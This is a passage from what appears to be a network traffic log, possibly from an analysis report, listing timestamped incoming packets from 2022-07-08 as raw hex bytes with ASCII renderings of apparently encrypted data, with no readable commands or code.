2022-07-08 04:01:38 UTC	23	IN	Data Raw: 41 b9 91 d7 4c bf fa 91 91 a0 8e d5 3a 95 22 fd f4 d4 2e 21 73 43 b8 42 70 16 83 cf 55 d9 2e 81 c2 0d 53 89 80 80 44 34 fc d9 b6 f4 9e 0a 93 0c b7 8a a2 19 21 97 90 26 6a a6 0b 14 23 66 47 43 1d b0 00 ce 42 a3 91 f1 a0 12 86 b8 31 44 7f 79 75 83 c5 60 94 d4 35 7d 02 2e 45 de 26 39 73 3f 74 d6 16 ca 1e 76 d0 b5 8c f5 36 98 5d b3 7a fa d2 b7 b6 04 fe 32 5e e3 39 0a 7e 41 03 e2 da c6 e8 3b 39 55 fa 4e 1a d4 e8 96 1c c7 ec 34 41 d0 0f 2f ce 86 98 7e 1b 92 76 86 4c a6 ad 92 2f 32 de 2e c5 f2 06 2d 5f de 7c dd 0d 27 1c bd 28 8d 93 a6 9d 18 c1 01 15 0b 3d bf be 8a fb 06 62 6a 3c 72 87 0b 47 1b 26 d6 54 87 49 90 9d 51 4b 93 f7 27 5c ac 6f b2 fc 32 8b 31 34 7d 0c 7a 62 f3 aa 68 7f 83 c7 31 d3 99 c7 9c 01 b0 5d cc 9f 39 6a 82 b3 90 24 5d 8b 1f 9b 13 cb 6f 45 85 9c Data Ascii: AL:".!sCBpU.SD4!&j#fGCB1Dyu`5}.E&9s?tv6]z2^9~A;9UN4A/~vL/2.-_\|'(=bj<rG&TIQK'\o214}zbh1]9j$]oE
2022-07-08 04:01:38 UTC	24	IN	Data Raw: 3a d0 11 9d 6d 23 b6 97 42 53 8a f4 db 74 72 ff b2 8c 54 a0 44 84 0b 73 cd e2 f5 c1 27 3f 84 fd 21 e5 2e 47 79 31 99 b2 ac 47 fd 4c 17 55 c9 4e 19 f4 09 a7 6d 34 df 1b e2 15 7c cf 55 bb a8 ba 77 07 50 7d 78 56 be ec 3d c8 2b 6a f2 af fb a2 4c 3a 53 77 58 9d e8 e1 44 65 0d 82 61 e8 6c ce 37 e8 40 ba 05 85 90 6d 5e 29 d3 1e 31 c7 3e 33 1a 14 f1 0f 21 cd 0e 24 a5 89 4b 00 23 51 30 24 97 ac 14 76 0f 11 ce c8 29 21 50 1a ed b5 b2 a2 f9 7c 5a 8f 56 fa b7 56 17 ef 47 d1 f7 ec c0 fe 22 f5 9f a3 60 b4 8c 06 1d 0d 79 91 ff 40 9c 8c 81 d3 4f 13 cc 9f 46 ac 6b 9b eb 8a dd bb 12 f2 ae 00 f9 86 1a b2 b6 86 03 0b b3 49 43 f4 59 b5 c3 c0 ad 4d e6 c8 b3 68 93 2e f8 98 bb dc 48 40 fe 83 48 d7 77 29 fa 98 6d 2f c7 6c 5d 02 c8 1d c1 4a ef 2b 9e 92 54 91 c0 e2 da be 18 3c 72 Data Ascii: :m#BStrTDs'?!.Gy1GLUNm4\|UwP}xV=+jL:SwXDeal7@m^)1>3!$K#Q0$v)!P\|ZVVG"`y@OFkICYMh.H@Hw)m/l]J+T<r
2022-07-08 04:01:38 UTC	25	IN	Data Raw: b3 74 d0 eb a4 b7 0e ff 6e 63 e3 39 02 e9 61 06 fb cd eb b5 51 25 61 f8 4a 1e eb 77 90 1c cd 99 2c 49 c6 0f 0d f2 8b 91 6e 25 df 85 e0 4c a6 a8 83 03 30 db 38 d8 1a 03 29 77 44 fc e9 07 36 1c 81 b8 a1 a0 9f 8f 82 5e 11 15 0b 02 6f a6 9b ed 14 4d 46 ab 73 8d 23 e7 0a 21 c0 de 9e 65 99 e2 9c 40 93 f3 02 e6 bf 68 b8 e7 eb f6 de 33 46 51 68 7d ef fc 6a 7f 92 c0 2e d9 67 c6 d4 e7 47 82 b1 61 c6 95 2e 5c 6e db 89 5c f4 65 cd f6 44 8d 96 9a eb 63 79 d2 24 07 25 43 78 a0 dc 1d 1c b4 d1 56 28 df 4b 12 7d 9a df 73 3d cf da 08 47 9f 6c 24 7a 18 40 85 f1 d4 de 6a 0b dc b0 ed 05 fa 96 9b 2f 02 3d 14 e7 39 72 65 4b 4c 0e 44 7e 62 53 7a bd c2 37 29 e3 34 b3 75 93 9b 8f 8c 2f a5 63 34 a8 e4 c4 bd 54 1d d3 43 55 87 34 68 4b 35 42 73 ad 4d 5f 1c 2d 50 bd d9 c8 2a b9 ac f7 Data Ascii: tnc9aQ%aJw,In%L08)wD6^oMFs#!e@h3FQh}j.gGa.\n\eDcy$%CxV(K}s=Gl$z@j/=9reKLD~bSz7)4u/c4TCU4hK5BsM_-P*
2022-07-08 04:01:38 UTC	27	IN	Data Raw: cd 0e 5b 34 0e ef 1c 31 d6 13 da b5 ae 51 e9 2e 7d 31 48 74 52 15 50 06 23 d8 fb 5a ce a4 fa ca 29 b1 8c 9f 36 4b 8b 7a 1a 9f 44 1c ed 4b 8d 0c ec c0 f6 30 f8 9e a3 6e f1 a8 05 1f 7c 2e 9f ec 4f 9f b5 99 cc b1 18 94 89 57 a4 7f 7c 8b 9b dd bf 32 b5 b3 21 f5 8c 1a a9 bf ea 2d f4 b2 6f 30 d7 5e 9d 2a ea e7 45 f5 a2 b9 78 93 24 da d5 bf dc 4e 16 d8 c5 49 d3 57 78 f7 e4 44 2e d6 6d 44 87 80 31 cb 59 4a 62 9e 92 53 ba f6 f1 d1 be 1a 07 6a 7d 8f 13 8c 8a aa 30 78 fc 53 f0 b5 ff a6 5d 4b e9 f8 c8 e4 bc f7 be 0d ae d0 5d 53 fc 5e 92 cf 14 ca fc 61 61 42 36 46 27 8b 65 8e dc ca 50 63 29 4b 40 cb 29 e8 2c 74 b3 5b 97 2a 0b 06 35 9d d1 c7 10 24 66 6f 78 03 cb 8a 24 97 7b d7 78 c5 8d cb 43 4f c4 a8 88 28 5a b9 ad 88 57 ce 70 90 31 5b 85 04 8f e2 d3 5f 20 cf 9a 1a aa Data Ascii: [41Q.}1HtRP#Z)6KzDK0n\|.OW\|2!-o0^Ex$NIWxD.mD1YJbSj}0xS]K]S^aaB6F'ePc)K@),t[5$fox${xCO(ZWp1[_
2022-07-08 04:01:38 UTC	28	IN	Data Raw: 31 57 1e 1a 64 e1 ae b9 73 9a dd 1f 3b 19 92 b0 18 bc 7a cb 00 3e 7d 7c a8 96 2d 66 6e 21 9a 13 d2 65 89 85 d4 fa 66 3c 9a 24 07 34 55 75 8b 9c d6 ea 52 d0 89 26 a5 51 3a 87 9a cb 8b 28 f6 54 1e b9 9a 3f 2f 71 0e b7 9c 50 2b e3 16 65 61 b0 ec 27 dc 8f 96 25 d5 e3 ca d5 15 7a fd 6e 7e 06 52 8a 19 79 69 ac e3 32 08 d7 ca b2 53 bb b0 8c b7 91 ad 48 27 98 e7 77 eb 54 11 60 09 55 87 3e 4e 42 0d b1 73 ad 4d 1e 15 30 bf 94 f1 c1 22 bc be 8d eb 4e 80 d6 9a 09 a8 52 31 ca ad 69 16 9f 91 f0 3a 73 d1 74 4c f0 82 95 2c 02 57 73 67 96 82 60 e4 d0 84 f5 aa dd 6f 76 9b 4b f2 52 9c 79 b4 27 61 25 fa 7b 72 89 58 b2 20 5a 2f c9 ec ce e3 22 5c 78 b3 91 52 61 5a c1 7e 5f 9c ac 30 45 f6 fa f8 1d 91 62 42 8a df ea ae 7b ba b9 90 c8 27 a8 82 f4 0d e6 51 3d 24 43 50 e2 49 33 c1 Data Ascii: 1Wds;z>}\|-fn!ef<$4UuR&Q:(T?/qP+ea'%zn~Ryi2SH'wT`U>NBsM0"NR1i:stL,Wsg`ovKRy'a%{rX Z/"\xRaZ~_0EbB{'Q=$CPI3
2022-07-08 04:01:38 UTC	29	IN	Data Raw: fa fd bb dc 5d 0d b3 83 52 d1 5d 67 aa f7 4f 3f d1 75 5a 41 8d 1f c1 4e c7 5c 9b 8d 5e 49 eb ce d2 b6 1c da 7a 9c 83 2c b3 8d af 1d 81 00 52 da ad 70 da 0f 4b e8 ef d8 ce 01 e0 b7 25 a6 c3 58 59 4f 4a 8a c8 e2 da d8 7a 77 2e f5 14 27 8f 0b e7 d5 db 53 6a 2b c4 54 c2 2f c5 ae 8a b2 7d b7 1c 2a 12 3c 9f df d8 0d df 7b bd 61 2d c7 8c 77 3a 7b d7 76 a8 b3 9a 43 45 4c bb 8a 53 11 aa a8 93 d4 6a 14 e4 20 50 90 12 62 e6 ff 5f 23 c7 1b b5 ab b5 f3 6a ae fe a5 7c a1 8c 51 a9 11 31 f8 f5 aa 26 3f 7d b7 93 68 56 14 f8 9f 54 c9 2a ad a6 12 5c 9a da df 55 3e fb 27 b7 d9 0d 1e b0 00 a4 8f a8 0a 26 a9 90 20 14 ad 09 69 00 3b 47 47 37 96 27 dd 47 a7 82 8a ae 19 78 b3 60 6e 7d 7b 0a e5 9f 1e a3 dc 5a 10 01 06 5d b0 bd 33 07 2a 6b dd 07 4f 2d 67 d5 a8 58 ae 64 bb 5f c8 30 Data Ascii: ]R]gO?uZAN\^Iz,RpK%XYOJzw.'Sj+T/}<{a-w:{vCELSj Pb_#j\|Q1&?}hVT\U>'& i;GG7'Gx`n}{Z]3*kO-gXd_0
2022-07-08 04:01:38 UTC	30	IN	Data Raw: b3 93 a4 9c 2e b5 62 34 aa e4 5e 74 3a 86 60 4c 55 87 2f 58 5c 05 23 73 87 4d 1e 1c 28 41 95 cc de 21 94 d8 c2 ec 59 7a c9 bb 0b b9 47 cf cc 97 9d 1f b1 ee aa 31 73 d2 73 bb fc ae 9e 1d fe 7d bc 6f 96 ae ee 72 d0 8e df 57 c6 62 65 a2 52 0c b4 b0 7d 9f ae 7c 28 eb 76 06 06 58 9e 27 7f 5a d3 1e cc e9 59 60 24 b2 95 44 16 40 45 48 a1 9d 81 28 46 f7 97 9e 96 91 66 47 fd 98 e7 ae 76 b4 28 e3 e5 2c a0 bc ef 05 94 50 3d 2a 59 4d f9 53 55 eb 7f d7 67 05 ad 99 49 77 e1 fd c4 72 e2 de ce cc 50 b3 50 b4 09 65 e3 43 91 95 2b 3f 88 f4 1f 12 2d 10 3c 36 81 9e 8c 6e e6 49 ce 13 c7 42 1d e2 25 bd 91 4e bd 11 fe 9c 72 d8 26 c9 a2 a5 76 06 7b 77 74 82 9f 3f d1 ce 03 c0 df af fd 8b 6e 3a 28 3f 37 d7 ec e2 35 31 16 8e 65 f6 1e 42 37 c4 5b 9a 2e 04 ca 6d 58 3b f0 05 17 ce 32 Data Ascii: .b4^t:`LU/X\#sM(A!YzG1ss}orWbeR}\|(vX'ZY`$D@EH(FfGv(,P=*YMSUgIwrPPeC+?-<6nIB%Nr&v{wt?n:(?751eB7[.mX;2
2022-07-08 04:01:38 UTC	32	IN	Data Raw: 6d e1 78 74 7b dd 6d bf db cc 43 54 4e b5 76 29 6d ba aa ec 14 dd 7b 94 4f 0f 9b 0f 7b f0 fb 57 35 de 16 5a ac 86 f5 9c be d6 94 4c db e9 51 b6 1b 1b b7 0a 44 dc 3f 78 5a 94 44 4b 10 9c c6 aa c8 02 bd c0 76 1d 89 df db 58 b6 ce d9 b6 f4 1b 0d aa 1e a1 95 f8 87 32 b7 79 3e 73 3a 1a 17 48 22 db 52 1e d4 21 52 53 a2 89 90 a5 8f 97 b7 57 6e e3 68 74 bf 83 71 d3 d4 35 73 1f 0c 44 d9 26 22 01 32 8a d7 38 46 2f 75 bf 10 a6 af 4e a7 42 ba 6d fe fa b5 b1 1b e5 b8 4c cf 20 0a 85 3c 03 e2 da f3 be c8 22 55 fa 4b 0e e3 f6 f8 68 cd 98 2a 5e c2 1e a9 fa 97 9e 63 cf c9 24 bc 4f dd cc 90 07 25 e6 6d 31 79 ed 37 4c da fc f8 0b 38 0b 69 29 a1 9a 94 e2 56 76 00 11 03 86 08 08 b3 91 14 65 58 bd 6b e8 7f 47 0a 2b d5 be 95 63 99 f2 64 5d 6d f2 06 42 a8 7b b4 ed 24 94 d0 22 af Data Ascii: mxt{mCTNv)m{O{W5ZLQD?xZDKvX2y>s:H"R!RSWnhtq5sD&"28F/uNBmL <"UKh*^c$O%m1y7L8i)VveXkG+cd]mB{$"
2022-07-08 04:01:38 UTC	33	IN	Data Raw: 4d a1 9d 80 28 72 f1 ec 09 95 91 62 18 86 c5 f6 b8 61 a6 7f 5a e7 2c aa 9a fc 7a c5 41 c3 2f 64 5e ed 32 74 d6 7e d3 7a 0b c7 9c 5f 55 9c e6 ab 0c 8c fe 94 98 41 a4 3e 9a 1a 77 d6 59 14 cd 07 25 8e 99 62 1b 2f 6f 75 b8 36 2c a9 39 fc 4a bf 5c df 2d 6d fc 16 a7 8c 2f e0 15 fe 89 60 d0 47 44 a2 89 73 09 2b 3f 62 a8 bb f9 05 cc 03 4d ef bc ee 8e 64 29 57 6e 2d 29 e9 cd 5a 6d 6d c0 61 e0 75 37 20 c3 df 0b 42 0b 91 6d 52 20 e0 3d 35 c7 25 21 2b 04 11 02 0d ec 1a a1 ea a5 49 13 2d 2a 74 3b 85 56 7a 30 0c 3a c1 9a 58 a4 fe e5 c7 d3 66 88 ff 35 5a 85 44 e7 f0 30 16 ef 47 ba e4 ff c4 fc 4e b9 88 5d 65 b2 ed 1c 0c 72 31 80 fb 5b 8f 5a 93 fe 58 1b c3 c9 46 ac 6d e0 8b f7 dc bf 32 ae b2 47 92 87 1a b2 ab e4 30 0e b3 52 28 cb a6 b4 e5 fd e5 34 aa a7 91 6d 85 0c ab fc Data Ascii: M(rbaZ,zA/d^2t~z_UA>wY%b/ou6,9J\-m/`GDs+?bMd)Wn-)Zmmau7 BmR =5%!+I-*t;Vz0:Xf5ZD0GN]er1[ZXFm2G0R(4m
2022-07-08 04:01:38 UTC	34	IN	Data Raw: 42 0b 0f 37 55 87 25 47 40 26 24 73 bc 49 01 15 d3 40 b9 ca ca 51 f1 c3 c2 ef 58 ac b3 96 09 ab 5a d5 a4 f5 63 1e 97 f3 b7 29 77 d5 7a 41 e7 7c 9d 1a d6 54 24 23 95 aa 85 fe 5d a1 d9 7d c7 6f 7f 84 48 5c cf b9 6a 80 b0 e0 21 e2 6e f5 7e 40 82 b1 5b 47 e1 83 ba e9 5f 19 63 a0 91 4e 7d 5e d7 6b 5f 9c ac 2c 40 8e a2 d0 96 95 61 6c fb c4 e7 a4 64 bc 28 e5 e4 2c a0 85 e0 6d de 50 2c 2a 51 b7 ee 65 35 d4 05 99 6d 23 b8 9b 30 20 8b fc ce 62 9f fa 9e 96 57 a8 2c 64 0a 5f d8 48 e8 b7 64 3f 8c e6 43 49 2f 6b 78 3d 9e 8d 92 41 fd 5b b1 57 39 43 35 eb 14 d6 dd 35 f3 15 e1 b5 4c b3 54 ba a9 b3 64 64 24 75 62 a2 a1 d3 2a ce 12 49 eb 51 fc a6 7c 3a 28 3f 37 d7 ec fe 62 05 3e f3 60 e0 7b 26 28 ab 25 bc 2d 75 8d 7e 5c 3f ea 2a 27 39 35 09 37 19 fc 07 21 d4 1c c5 bf 5b 48 Data Ascii: B7U%G@&$sI@QXZc)wzA\|T$#]}oH\j!n~@[G_cN}^k_,@ald(,mP,Qe5m#0 bW,d_Hd?CI/kx=A[W9C55LTdd$ubIQ\|:(?7b>`{&(%-u~\?*'957![H
2022-07-08 04:01:38 UTC	35	IN	Data Raw: 40 ad 99 20 5e a0 56 96 76 d0 6a 97 00 6b 92 0f 71 d1 94 51 2d cb 1e 4b bb 91 e1 9c be d6 97 5e a4 9a 6a 1b 1f 22 fd ea b2 30 28 73 58 9a 5f a4 17 af c3 57 d6 25 e5 dd 12 0c 0d d3 c3 57 33 e1 c8 be ed f6 09 97 0b b4 95 b1 7f 03 0e 69 21 38 71 8f 01 57 22 54 4b 1b dc 33 d9 bc a6 bf 8c a9 00 8e b2 5d 70 63 87 70 85 94 1d bc b0 2a 46 5f 82 5a c2 35 3b 07 3d 7c c9 19 b4 2c 5a c4 a3 a3 be 4f ba 59 b5 76 f1 eb a2 9f 83 f5 46 47 fc 37 1b f6 72 12 ea c1 e5 4c 44 21 5d fc 5c 36 c9 e5 9d 0f c5 98 31 49 ca f3 ae d6 8a 9b 65 21 ac 17 ad 13 22 a3 8b 14 29 df 3f c7 9b ec 2c 73 d0 ff f6 12 78 00 4e ac 9e 86 88 8a 10 76 11 1d 14 03 41 bf b7 e6 3d 2e 52 ab 79 94 0e 58 06 32 c2 aa 97 6d 86 ef 9c 4a bf f5 01 5e a0 65 a1 e5 35 83 c7 23 af 08 52 6d fe aa 67 7f 83 c8 31 d7 99 Data Ascii: @ ^VvjkqQ-K^j"0(sX_W%W3i!8qW"TK3]pcp*F_Z5;=\|,ZOYvFG7rLD!]\61Ie!")?,sxNvA=.RyX2mJ^e5#Rmg1
2022-07-08 04:01:38 UTC	36	IN	Data Raw: 4e fb 99 e7 ae 76 bd 57 82 ec 2c bb 92 f2 6a 24 51 11 3e 4b 41 f0 43 ec fe 12 d6 6d 29 af 98 40 4a 99 f4 c4 69 84 e1 86 79 52 9b 23 9f 08 7b d6 54 3c e4 a2 3e 8c e8 04 91 2e 6b 78 4b e2 9a 81 41 e2 53 a6 42 c7 53 11 ea e8 ac bf 36 e4 02 f6 98 75 c7 4a a6 5d a4 50 09 7b 70 5a dc 42 3f d1 e4 03 4d f0 bc cd 8e 64 19 52 71 37 b6 e8 e1 5f 79 1d b6 75 e1 71 30 36 c3 46 42 2c 53 93 75 53 3f fc 32 cf c6 18 3f 36 75 a1 03 21 c1 1b a1 c4 a5 49 13 07 2a 39 3b 8f 44 0f 35 79 3a cb fa 47 d4 af e2 dd 29 b1 8c 98 36 21 c1 52 f9 9b 47 6d b6 4d a5 eb c4 bc fd 5f b7 89 bb 0b ea ee 04 15 6d 3a 91 f8 5a 61 a5 be f3 4d 62 f6 87 46 a8 6b e5 d8 d1 dd bf 3c d7 30 28 e6 81 32 c3 b5 f5 29 1c a9 2c 58 d5 58 bf d6 e3 ec 4f e3 b8 98 97 92 08 df ff c0 92 4e 3d b3 85 27 ac 5c 67 f2 e8 Data Ascii: NvW,j$Q>KACm)@JiyR#{T<>.kxKASBS6uJ]P{pZB?MdRq7_yuq06FB,SuS?2?6u!I*9;D5y:G)6!RGmM_m:ZaMbFk<0(2),XXON='\g
2022-07-08 04:01:38 UTC	37	IN	Data Raw: 1d 6d 00 06 5d f7 db 33 07 26 09 66 14 4a 29 75 c4 4f a7 b9 b6 aa 57 b5 52 d5 f8 a7 39 b3 89 f5 4d e3 3d 0a fc 09 b0 e2 de e8 9a d1 0c 55 f0 37 aa fc fa 93 1f db 9a 5b f3 d0 0d ab f8 fd 2b 7a 31 cc 20 27 4d a6 a3 94 13 df de 38 31 87 19 2a 73 f1 fe ed 83 90 65 22 28 8d 84 94 9b 63 c3 00 15 0f 20 2b bf 9b e7 68 d1 52 ab 77 83 1d 45 71 95 ca aa 82 67 e2 56 62 4b 97 db bf 40 bf 62 b7 f9 cb 93 d9 cb 50 05 76 42 ae bb 6a f1 25 bd 99 d9 67 c2 b2 1a c3 ca cd 9e 3d 42 3e a2 91 2e 2a 15 0b 9a 17 c4 43 88 fe 2a fa 66 38 d2 5f b0 25 43 7c 88 49 d7 e3 41 2c 8d 84 1d 2b ab 7d 9b cf 8f 3c a5 66 1e b9 98 1b a1 7d 0e b4 f9 16 2a cf 1a 3c dc b0 ff 1d d5 96 a6 24 dc f4 51 d4 39 69 f3 70 7a 37 6b 75 18 55 6b aa ea 2d 08 33 35 9f 78 b1 b7 ae 83 25 b6 66 34 b9 e0 68 78 aa 10 Data Ascii: m]3&fJ)uOWR9M=U7[+z1 'M81se"(c +hRwEqgVbK@bPvBj%g=B>.Cf8_%C\|IA,+}<f}<$Q9ipz7kuUk-35x%f4hx
2022-07-08 04:01:38 UTC	39	IN	Data Raw: 39 e0 4e 6f 7c 8e 61 f1 73 35 4d 14 51 bc 29 57 44 6d 58 39 94 f7 31 c7 3e 03 14 f1 ef 03 21 48 37 da a4 a4 45 15 27 3e e4 3b 85 58 0d 74 06 1a ce f0 5a 5f a5 38 5a d6 b0 a0 8a 22 cb 94 7c f2 bf 41 16 ef cd af 32 60 c1 fc 5f b5 88 32 7c ad b7 01 64 a6 31 91 fb 69 94 84 97 d2 4f 99 b2 5a 35 ad 69 e6 a1 8f a6 6e 38 b8 a8 47 3f 87 1a b2 92 f7 2b 65 6f 43 2c df 40 9b c2 ca e2 4f e4 27 9b b4 c2 25 d0 fd b3 ca df 2a 99 88 68 d6 5d 67 78 fd 92 6e c6 66 5f 71 96 8c d7 60 cc 6d 9c 92 52 37 e0 3f f5 bf 0b 0c 5d 92 86 28 27 9b 90 13 b9 fc 53 f6 22 78 7c 41 4a e8 eb c1 f1 97 c8 b4 0d 6e d0 5d 5f 47 7c b5 d2 18 d8 9b ac 75 55 bd 07 23 9a 60 b0 d2 c1 53 a8 c4 d7 51 c2 2f c4 df 61 b3 51 bb c9 13 0c 35 8e cd db 34 0b 67 43 66 02 de a6 da 74 7b d1 1d 73 c8 ca 49 63 4a a5 Data Ascii: 9No\|as5MQ)WDmX91>!H7E'>;XtZ_8Z"\|A2`_2\|d1iOZ5in8G?+eoC,@O'%*h]gxnf_q`mR7?]('S"x\|AJn]_G\|uU#`SQ/aQ54gCft{sIcJ
2022-07-08 04:01:38 UTC	40	IN	Data Raw: 09 47 0c 09 84 aa 86 6f b3 e3 62 4b 80 c3 28 41 97 68 b2 ed 5a 92 cf 24 47 02 55 75 e9 be 78 81 93 ec 2c c1 6c c6 b7 0e 46 7c e1 9c 2e 61 aa a4 89 da 56 8f 09 b1 11 ea b6 88 fe 5a fa 66 38 fa 06 05 26 3e be a0 dc d2 c9 4b 2e 88 19 9a 54 12 55 9b cb 8d 4e de df 0f af 97 18 2e 7c 09 a9 7a af 06 cd 06 1d dc b7 fa d3 d6 ba 99 32 d7 f4 33 cc c7 79 c9 61 55 0d 6f 97 1a 2e a2 bb ee 36 2b de 04 b1 7f 9a 9b 8e 9c 2a a5 62 25 be ef 5c 6f 54 16 77 bd 54 ab 2d 40 44 35 27 65 53 4c 32 1e 3a 4a 95 da d0 d4 be ef c0 c0 4c af 2b 81 23 a1 5f ff c9 81 4b 1e 9d ec bb 3a 73 c4 7d 4e d6 99 9c 31 eb a8 5e 41 97 b2 8a e4 d7 98 27 7c ea 60 61 99 57 0b 4b 4e 7c b3 f9 57 2a d1 91 6b 0c 9e 9e 2d 56 7b d9 ee cd 94 98 13 78 b7 bf 4e 6c 5a db 57 a3 9d a8 3b 42 f5 9d d0 96 80 74 4f ad Data Ascii: GobK(AhZ$GUux,lF\|.aVZf8&>K.TUN.\|z23yaUo.6+b%\oTwT-@D5'eSL2:JL+#_K:s}N1^A'\|`aWKN\|Wk-V{xNlZW;BtO
2022-07-08 04:01:38 UTC	41	IN	Data Raw: 80 c4 f2 9c d8 23 0a b9 55 3f d2 5b 95 c8 ea e7 cf cc 53 93 69 95 0c 3a fd bb da 68 e3 bb ab 65 d3 5d 6d d0 d9 4f 2e cd b8 5f 51 af 1d c1 44 19 51 8f 95 7e bd fb e4 d9 96 f8 0c 76 85 a5 32 b5 a5 6c 18 99 f8 42 f0 8a a0 a1 5d 4d 34 c1 cf f5 fa 9d b7 25 bf d0 5d 59 75 4f 95 dc 29 db f4 75 15 55 bb 14 02 8b 64 9d 64 db 59 74 3e d7 51 c2 15 c0 b0 74 86 51 b1 37 9d 0d 35 8c f9 d8 1c da 7a 43 60 00 da 8e 0c 74 44 d5 72 aa db ca 43 45 1a af 88 28 4d aa a8 97 47 dd 7b 91 20 50 9a 0f 65 e3 ff 4e 05 da 16 4b 9d 9b ff 62 91 fa 9b 4f bd 8c 51 b7 1d 22 fd f5 af 23 20 73 18 90 44 5a 73 81 cf 54 d5 2e 81 c2 0d 53 89 df c4 74 33 e1 df b2 f5 08 7d bb 1b a6 89 bc 4a 27 a7 3a 24 2c f7 05 16 46 69 49 46 0f 9c 2f c5 40 b5 92 81 b7 3b 6e b2 4c 7e 52 7b 67 83 ec 49 a7 d4 3f 73 Data Ascii: #U?[Si:he]mO._QDQ~v2lB]M4%]YuO)uUddYt>QtQ75zC`tDrCE(MG{ PeNKbOQ"# sDZsT.St3}J':$,FiIF/@;nL~R{gI?s
2022-07-08 04:01:38 UTC	43	IN	Data Raw: f0 f3 3c c2 0a 1a fb 70 75 0f 55 7f 07 5c 95 ba c2 34 17 e7 2b b9 6c b2 9b 9f 97 36 5b 63 18 ae e0 63 25 4e 02 6b 43 44 8c 33 a6 4e 19 29 53 ad 6d 1e 1c 21 5c 86 d6 c8 3b b4 dd 3c ea 62 91 ca b7 09 a1 4c 4f e3 75 61 1e 9b c4 57 3a 73 d3 4d 5a f4 91 97 36 ed 5d 48 93 94 86 82 fc c3 85 d9 6c cd 7d 7c 6c 56 20 73 a1 79 92 f9 7b 5c f6 72 69 6c 48 9a 25 44 3e 42 ed ce e3 4c 15 69 b5 83 7d 29 4c e2 78 aa 8e 8b 3b 53 fe f6 2e 97 bd 6c 64 86 e5 e7 ae ff 8d 47 91 e5 27 b1 89 e6 7e cb 5b 25 d0 49 65 e9 4a 2e 87 67 c4 66 23 ad 96 49 a1 8b d0 c7 6f 9f f5 9e 96 58 a8 31 64 0a 5f cb 6b ef f4 0e c0 73 1d 3d 1f 3e 6d a4 25 85 92 90 43 27 46 b2 3e cb 42 19 e7 00 a4 8a ef db ab ff 98 6e de 51 a8 a3 8d b3 0b 50 73 5b ba 40 3f d1 cd 2b ee f0 af f7 8d 10 34 53 71 2c c1 ee 8e Data Ascii: <puU\4+l6[cc%NkCD3N)Sm!\;<bLOuaW:sMZ6]Hl}\|lV sy{\rilH%D>BLi})Lx;S.ldG'~[%IeJ.gf#IoX1d_ks=>m%C'F>BnQPs[@?+4Sq,
2022-07-08 04:01:38 UTC	44	IN	Data Raw: d1 51 d3 38 dc 4e 75 9f 41 b3 3f 0e f3 34 9a 24 d9 61 06 67 43 64 1c c9 88 0c 65 7d ce 8c ab e4 ce 69 5f 5b ab 88 39 47 bd 56 96 76 de 63 83 26 50 8b 09 6e f5 01 4f 0a d3 14 5f d7 4f ff 62 bb e5 8c 5c a6 8c 40 b0 00 33 03 f4 97 28 22 74 34 46 44 5a 12 9c dd 47 cf 2e 90 c4 13 ad 88 f3 cf 46 40 3b d9 b6 f1 1f 75 67 1b b7 8e b7 12 30 b4 6e 30 3e b9 01 ec 51 17 48 41 60 19 3b ce 46 8f 41 8f b1 15 99 b9 5f 7e 7f 68 77 b6 8c e0 a6 f8 38 68 04 72 e3 df 26 32 14 29 6b c2 07 4c 2d 67 d6 ae aa 51 49 87 52 b1 05 2a fa a4 b3 2c 27 46 4d e5 26 05 ed 74 03 f3 d8 f6 4c 44 21 50 ed 46 03 ef fc 97 0d cb 87 34 bf d1 21 be f8 97 9c 0e 85 c8 08 b3 31 75 a9 90 03 3e ca 3d c9 86 03 2b 40 ce 02 e8 21 20 0c 84 2c 92 93 85 9f 18 67 06 0a 02 f6 be 92 90 ef 01 18 88 ab 73 83 14 4d Data Ascii: Q8NuA?4$agCde}i_[9GVvc&PnO_Ob\@3("t4FDZG.F@;ug0n0>QHA`;FA_~hw8hr&2)kL-gQIR*,'FM&tLD!PF4!1u>=+@! ,gsM
2022-07-08 04:01:38 UTC	45	IN	Data Raw: 37 c4 8c 68 5b 55 9d 7d 54 3e 3c ed ce e3 40 2c 6b a8 95 5f 77 45 d7 99 a0 b1 8a 2a 49 ef 3a c3 9d 8e 42 57 9d c5 f6 b5 6d 97 b9 90 c8 2b bb 83 e6 61 ec 43 26 2e 59 52 f0 7e c4 d7 52 cb 7c 26 94 55 5e 5f 80 d4 8d 7a 8c f8 b6 a5 51 b7 3c f5 41 73 c9 4a f9 d6 34 07 9f f9 2c 0a 34 74 53 c8 80 b6 8a 54 f6 5b bb 9c d4 49 06 de 05 b6 93 24 e8 0e ed 66 65 e3 5f ab a8 bf aa 18 5b 6a 76 bb a4 c0 3f d5 1c 50 0e ae d1 81 75 33 42 61 e1 c4 e3 fe 50 7c 0d 8e 70 fb 6e 2a c8 c5 7d b2 2f 6e 9a 45 9d 3e fb 24 22 d7 2b 3e 27 15 ef 12 3a da 29 24 a5 89 58 15 3e 5a 29 3e 93 43 13 72 fb 3a cb fa 45 ed bc fe c7 c6 ab bf ad ca 5b a3 58 e8 94 5e c0 fc 46 ba df ff db fc 4e a6 80 9f 9a 9f c2 08 19 67 3e fe be 45 9f a2 8d ef 5c 02 b8 96 5d b5 97 e7 8f 87 df ae 33 90 c7 29 e6 8d 09 Data Ascii: 7h[U}T><@,k_wEI:BWm+aC&.YR~R\|&U^_zQ<AsJ4,4tST[I$fe_[jv?Pu3BaP\|pn}/nE>$"+>':)$X>Z)>Cr:E[X^FNg>E\]3)
2022-07-08 04:01:38 UTC	46	IN	Data Raw: de 22 b2 64 2b 29 a9 11 c4 43 34 45 52 14 e5 fe cf 42 ad 98 9e be 09 50 a1 43 7a 6e 76 59 6c 9e 1e ad c7 24 68 0f 1c 81 cc 29 22 16 3b ae c1 c2 c7 02 76 d0 b0 b5 bf 4a ba 52 a2 6e ee eb b5 9f f2 f4 46 47 f2 36 19 ef a4 10 ed dc fd bd 6d c8 54 fa 40 0b f2 eb 98 06 dc 96 f6 97 c3 02 ad eb 89 b0 bf 30 c8 02 be 5d a9 b3 46 14 2e dd 3f c0 ae d7 2c 5f d6 f1 f8 02 3d ce 84 27 8f 91 99 b1 dd 77 00 1f 18 05 ae b1 81 fc 18 b3 84 b8 7c 85 1a 48 22 e4 cb aa 8c 76 9c f2 6d 51 45 e0 25 50 ba 7f 68 fa e3 1f e0 35 51 08 6d 6a eb a8 60 6e 96 d6 3f dc 4f 30 b0 18 b2 7e dc 92 56 a6 ab a3 9b 1d 7b a2 0b 9a 1b e1 5b 0a 85 9c ba f9 3c d0 24 04 34 4f 17 6d dd d6 e9 24 1f 89 0a a0 7e e8 7d 9b cd 9e 2a cf cb 0f a9 94 1b 